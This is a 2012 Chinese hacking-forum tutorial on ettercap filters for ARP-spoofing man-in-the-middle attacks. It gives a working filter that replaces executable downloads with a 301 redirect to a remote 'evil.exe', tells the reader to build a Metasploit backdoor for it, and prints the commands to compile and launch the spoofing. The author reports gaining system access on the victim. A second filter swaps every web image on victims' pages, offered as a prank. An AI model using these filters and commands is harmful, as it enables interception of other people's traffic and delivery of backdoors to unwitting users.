切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
49. 插队 强大的嗅探工具ettercap使用教程:我的规则[复制链接]
发表于 2012-8-20 00:03:48 | 显示全部楼层 |!read_mode!
ettercap是LINUX下一个强大的欺骗工具,当然WINDOWS也能用,你能够用飞一般的速度创建和发送伪造的包.让你发送从网络适配 器到应用软件各种级别的包.绑定监听数据到一个本地端口:从一个客户端连接到这个端口并且能够为不知道的协议解码或者把数据插进去(只有在arp为基础模 式里才能用)
下面我们来说说咋吧数据插进去

首先你得有自己个规则,默认的ETTERCAP自带了几个
  1. brk@Dis9Team:/usr/share/ettercap$ ls
  2. ettercap.png  etterfilter.cnt        etterfilter.tbl   etter.mime
  3. etter.dns     etter.filter.examples  etter.finger.mac  etter.services
  4. etter.fields  etter.filter.kill      etter.finger.os   etter.ssl.crt
  5. etter.filter  etter.filter.ssh       etterlog.dtd
  6. brk@Dis9Team:/usr/share/ettercap$
复制代码
在入侵过程种,这些达不到我们想要的,来看这个规则

  1. # replace rmccurdy with your website
  2. # replace the url with what ever exe you like

  3. if (ip.proto == TCP && tcp.dst == 80) {
  4.    if (search(DATA.data, "Accept-Encoding")) {
  5.       replace("Accept-Encoding", "Accept-Rubbish!");
  6.           # note: replacement string is same length as original string
  7.      msg("zapped Accept-Encoding!n");
  8.    }
  9. }
  10. if (ip.proto == TCP && tcp.src == 80) {
  11.    replace("keep-alive", "close" ");
  12. replace("Keep-Alive", "close" ");

  13. }

  14. if (ip.proto == TCP && search(DATA.data, ": application") ){
  15. # enable for logging log(DECODED.data, "/tmp/log.log");
  16. msg("found EXEn");
  17. # "Win32" is the first part of the exe example:
  18. # if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
  19. if (search(DATA.data, "Win32")) {
  20. msg("doing nothingn");
  21. } else {
  22. replace("200 OK", "301 Moved Permanently
  23. Location: http://www.dis9.com/evil.exe
  24. ");
  25. msg("redirect successn");

  26. }
  27. }
复制代码


他吧80端口请求的数据application(也就是附件)301重定向成了他自己的EXE程序,这个EXE必须是Win32程序,也就是命令行的。
下面来尝试一下,用MSF生成个TCP后门,再把Location: http://www.dis9.com/evil.exe 改成自己的地址
用etterfilter吧规则文件编译成ettercap能读懂的文件,进行欺骗

brk@Dis9Team:/$ etterfilter exe.filter -o exe.ef
brk@Dis9Team:/$ sudo ettercap -T -q -i vboxnet0 -F exe.ef -M ARP // // -P autoadd
模式必须是ARP的,当这个网段的某机子下载某WIN程序的时候,

神奇的东西出现了



程序已经被替换成了我们的后门

当他点击运行的时候,我们获得了他的系统权限




如果你是一个喜欢恶作剧的人,

你还可以看看这个脚本 他吧80端口请求的图片替换成了本地的

http://www.irongeek.com/i.php?page=security/ettercapfilter


  1. if (ip.proto == TCP && tcp.dst == 80) {
  2.    if (search(DATA.data, "Accept-Encoding")) {
  3.       replace("Accept-Encoding", "Accept-Rubbish!");
  4.        # note: replacement string is same length as original string
  5.      msg("zapped Accept-Encoding!n");
  6.    }
  7. }
  8. if (ip.proto == TCP && tcp.src == 80) {
  9.    replace("img src=", "img src=http://www.2cto.com/uploadfile/2012/0508/20120508011856683.jpeg" ");
  10.    replace("IMG SRC=", "img src=http://www.2cto.com/uploadfile/2012/0508/20120508011856683.jpeg" ");
  11.    msg("Filter Ran.n");
  12. }
复制代码


编译运行试试

  1. root@Dis9Team:/tmp# etterfilter 1 -o pic.ef

  2. etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA

  3. 12 protocol tables loaded:
  4.      DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

  5. 11 constants loaded:
  6.      VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

  7. Parsing source file '1'  done.

  8. Unfolding the meta-tree  done.

  9. Converting labels to real offsets  done.

  10. Writing output to 'pic.ef'  done.

  11. -> Script encoded into 16 instructions.
  12. root@Dis9Team:/tmp# ettercap -T -q -i vboxnet0 -F pic.ef -M ARP // // -P autoadd

  13. ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

  14. Content filters loaded from pic.ef...
  15. Listening on vboxnet0... (Ethernet)

  16. vboxnet0 ->    0A:00:27:00:00:00       192.1.1.200     255.255.255.0
复制代码
运行没出粗 这样别人访问的网页图片全部都是你设置的了

网卡的原因我只能本地测试啦



这是正常的 别人访问后




附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-1 22:04

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部